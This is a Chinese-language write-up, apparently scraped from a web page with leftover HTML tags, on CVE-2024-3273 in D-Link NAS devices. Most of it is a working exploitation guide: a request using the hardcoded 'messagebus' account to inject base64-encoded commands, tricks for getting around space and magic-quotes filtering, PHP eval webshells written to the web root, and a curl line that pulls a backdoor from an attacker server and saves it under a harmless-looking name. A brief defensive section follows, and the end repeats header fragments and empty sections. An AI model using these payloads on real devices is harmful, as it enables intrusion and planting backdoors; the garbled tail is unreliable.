D-Link RCE漏洞(CVE-2024-3273)分析与绕过技术详解<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2024-3273
影响产品<\/strong>: D-Link网络存储(NAS)设备
漏洞类型<\/strong>: 命令注入+后门账户
风险等级<\/strong>: 高危
影响范围<\/strong>: 使用nas_sharing.cgi脚本的D-Link NAS设备<\/p>

漏洞成因分析<\/h2>
该漏洞由两个关键问题组成：<\/p>

硬编码后门账户<\/strong>:<\/p>

用户名: messagebus<\/code><\/li>
密码: 空<\/li> <\/ul> <\/li>
命令注入漏洞<\/strong>:<\/p> 位于\/cgi-bin\/nas_sharing.cgi<\/code>脚本中<\/li> system<\/code>参数存在未过滤的命令注入<\/li> 通过HTTP GET请求触发<\/li> <\/ul> <\/li> <\/ol> 漏洞验证方法<\/h2> 基本验证方式<\/h3> 访问以下URL验证漏洞是否存在：<\/p> \/cgi-bin\/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= <\/code><\/pre> 其中：<\/p> user=messagebus<\/code>: 使用硬编码后门账户<\/li> passwd=<\/code>: 空密码<\/li> cmd=15<\/code>: 固定参数<\/li> system=aWQ=<\/code>: 要执行的命令(base64编码)，此处aWQ=<\/code>是id<\/code>命令的base64编码<\/li> <\/ul> 验证结果判断<\/strong>:<\/p> 如果返回当前用户ID信息，则存在漏洞<\/li> 无响应或错误响应则可能不存在漏洞<\/li> <\/ul> 漏洞利用技术<\/h2> 基本利用流程<\/h3> 构造恶意请求：<\/p> \/cgi-bin\/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=<base64编码的命令> <\/code><\/pre> <\/li> 命令需要先进行base64编码：<\/p> echo -n "id"<\/span> | base64 # 输出: aWQ=<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 写入文件测试<\/h3> 尝试写入PHP文件：<\/p> echo '<?php phpinfo();?>'<\/span> > \/var\/www\/html\/666.php <\/span><\/span><\/code><\/pre>base64编码后：<\/p> echo -n "echo '<?php phpinfo();?>' > \/var\/www\/html\/666.php"<\/span> | base64 <\/span><\/span><\/code><\/pre>空格过滤绕过技术<\/h3> 发现空格被过滤时，可使用以下替代方法：<\/p> 使用Tab键替代空格<\/strong>:<\/p> 原始命令: ls \/ -al<\/code><\/li> 替换后: ls<tab>\/-al<\/code> (其中表示Tab字符)<\/li> <\/ul> <\/li> 其他可能的空格替代方案:<\/p> ${IFS}<\/code> (内部字段分隔符)<\/li> <<\/code> 或 ><\/code> 重定向符号<\/li> %09<\/code> (URL编码的Tab)<\/li> <\/ul> <\/li> <\/ol> 魔术引号绕过技术<\/h3> 当PHP的magic_quotes_gpc<\/code>开启时(默认在PHP 5.2)，特殊字符会被自动转义，需要绕过：<\/p> 使用stripslashes()函数<\/strong>:<\/p> <?<\/span>php<\/span> eval<\/span>(stripslashes<\/span>($_POST['cmd'<\/span>]));?><\/span> <\/span><\/span><\/span><\/code><\/pre>base64编码：<\/p> echo -n "echo '<?php eval(stripslashes(\$_POST[\"cmd\"]));?>' > \/var\/www\/html\/8.php"<\/span> | base64 <\/span><\/span><\/code><\/pre><\/li> 其他绕过方法(文中提到未成功):<\/p> base64_decode()<\/code>传输代码<\/li> chr()<\/code>逐字符拼接<\/li> call_user_func()<\/code>动态调用<\/li> 双重str_replace()<\/code><\/li> <\/ul> <\/li> <\/ol> 文件写入与WebShell部署<\/h3> 写入phpinfo测试文件：<\/p> echo '<?php phpinfo();?>'<\/span> > \/var\/www\/html\/info.php <\/span><\/span><\/code><\/pre><\/li> 写入WebShell：<\/p> echo '<?php eval(stripslashes($_POST["cmd"]));?>'<\/span> > \/var\/www\/html\/shell.php <\/span><\/span><\/code><\/pre><\/li> 从远程下载WebShell：<\/p> curl vps_ip:8000\/qsd-php-backdoor.php -o \/var\/www\/html\/theme-config.php <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御建议<\/h2> 厂商修复方案<\/strong>:<\/p> 移除硬编码账户<\/li> 对system参数进行严格过滤<\/li> 升级固件版本<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>:<\/p> 禁用nas_sharing.cgi脚本<\/li> 配置防火墙规则限制访问<\/li> 监控异常访问日志<\/li> <\/ul> <\/li> 用户防护建议<\/strong>:<\/p> 及时更新设备固件<\/li> 修改默认凭证<\/li> 限制管理界面访问<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> CVE-2024-3273漏洞结合了硬编码凭证和命令注入两大安全问题，攻击者可在未授权情况下实现远程代码执行。通过本文分析的各种绕过技术，特别是针对空格过滤和魔术引号的绕过方法，安全研究人员可以更全面地评估该漏洞的影响范围和危害程度。<\/p>

D-Link RCE漏洞(CVE-2024-3273)分析与绕过技术详解<\/h1>

漏洞概述<\/h2> 漏洞编号<\/strong>: CVE-2024-3273 影响产品<\/strong>: D-Link网络存储(NAS)设备 漏洞类型<\/strong>: 命令注入+后门账户 风险等级<\/strong>: 高危 影响范围<\/strong>: 使用nas_sharing.cgi脚本的D-Link NAS设备<\/p>

漏洞验证方法<\/h2>

漏洞利用技术<\/h2>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2024-3273
影响产品<\/strong>: D-Link网络存储(NAS)设备
漏洞类型<\/strong>: 命令注入+后门账户
风险等级<\/strong>: 高危
影响范围<\/strong>: 使用nas_sharing.cgi脚本的D-Link NAS设备<\/p>